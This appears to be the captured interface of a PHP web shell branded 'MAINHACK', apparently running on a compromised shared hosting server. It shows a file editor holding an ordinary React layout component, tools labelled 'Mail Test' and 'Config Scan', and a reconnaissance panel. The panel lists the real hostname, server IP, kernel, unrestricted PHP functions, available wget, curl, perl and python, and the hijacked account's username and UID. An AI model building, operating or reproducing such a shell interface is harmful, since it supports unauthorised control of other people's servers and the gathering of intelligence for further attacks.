[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: PageLayout.jsx
import { PageControl } from '@launch/components/PageControl'; import { Logo } from '@launch/svg'; export const PageLayout = ({ children, includeNav = true }) => { return ( <div className="flex h-[calc(100dvh)] flex-col"> <div className="w-full flex-none bg-banner-main px-6 py-5 md:px-12 md:py-6"> {window.extSharedData?.partnerLogo ? ( <div className="flex h-10 max-w-52 items-center overflow-hidden md:max-w-72"> <img className="max-h-full max-w-full object-contain" src={window.extSharedData.partnerLogo} alt={window.extSharedData?.partnerName ?? ''} /> </div> ) : ( <Logo className="h-8 w-auto text-banner-text" /> )} </div> {children} {includeNav && ( <div className="z-10 w-full flex-none border-t border-gray-100 bg-white px-6 py-5 shadow-surface md:px-12 md:py-6"> <PageControl /> </div> )} </div> ); };
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium166.web-hosting.com
Server IP: 162.0.209.40
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium166.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 75.3 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: kataubyb
User ID (UID): 624
Group ID (GID): 625
Script Owner UID: 624
Current Dir Owner: 624